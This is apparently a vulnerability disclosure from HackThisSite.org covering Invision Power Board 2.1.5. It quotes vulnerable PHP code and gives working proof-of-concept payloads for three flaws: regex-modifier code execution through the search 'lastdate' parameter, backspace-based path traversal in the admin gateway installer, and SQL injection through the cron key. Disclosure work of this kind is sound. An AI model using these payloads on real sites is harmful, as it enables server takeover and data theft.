Invision Vulnerabilities, including remote code execution
Several Invision Flaws (2.1.5 and possibly earlier)
---------------------------------------------------
IceShaman & Wells
HackThisSite.org
1) Code execution
sources/action_public/search.php line 1261
$this->output = preg_replace(
"#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1
selected='selected'",
$this->output );
The input string is not properly sanitized which can lead to arbitrary code
execution.
Example exploit:
- Post in a forum with "eval(die()); //" somewhere in the body of the post
- Use the search form to find text die just by your username (so only one
result shows)
make sure "Show results as posts" is selected.
- Append to the URL at the top &lastdate=z|eval.*?%20//)%23e%00 and press return
- The code should have been executed
The lastdate string alters the regex to accept anything inside eval() and parse
it as code, as
an #e modifier is added and then %00 used which will be parsed as a null byte
and truncate
the string thus removing the original )#i part.
Due to selected='selected' also being executed as php code a space and // has
to be used to turn
the text into a comment so it will be ignored by PHP.
As you can see this is just the beginning. You can upload an avatar with php
code somewhere in it
and changed the above example to include() it thus running as much PHP code as
you like. On default
PHP setups you can also include() remote files.
2) Remote file inclusion (requires admin)
sources/action_admin/paysubscriptions.php line 282
$gateway = trim( $this->ipsclass->input['name'] );
The input string is not properly sanitized and can be used to transverse
directories in
this later include on line 307:
require_once( ROOT_PATH .
'sources/classes/paymentgateways/class_gw_'.$gateway.'.php' );
This code may look safe as the prefix to the file is hardcoded, unfortunately
the backspace
character may be used to remove this prefix thus allowing ../../ combinations
to execute code
from any file ending in .php.
Example:
http://host/admin.php?adsess=...§ion=content&act=msubs&code=install-gateway&name=
%08%08%08%08%08%08%08%08%08/../class_gw_test
The above is a simple POC which installs the 'test' gateway. %08 will be
parsed as the backspace character, 9 of them are required to remove 'class_gw_'.
Where as this is not a serious threat, someone with access to the system
(shared server,
with a /tmp directory?) who happened to gain/have access to the admin panel
would
be able to use this to run arbitrary code on the server in the correct
circumstances.
3) SQL Injection (limited use)
sources/lib/func_taskmanager.php line 70
$this->cron_key = substr( trim(stripslashes($_REQUEST['ck'])), 0, 32 );
The input from 'ck' is not sanitized which could lead to an SQL Injection
(limited to 32 characters)
on line 113: 'where' => "task_cronkey='".$this->cron_key."'",
Example: http://www.host.com/index.php?act=task&ck='
Although this is limited to 32 characters, it still may pose a risk in certain
circumstances.
Flaws researched by IceShaman and Wells
Flaw #1 was first discovered by "securicore" security group and used to exploit
my forums. This led
to me doing a quick audit of the code to find it (it goes without saying that I
succeeded).
- IceShaman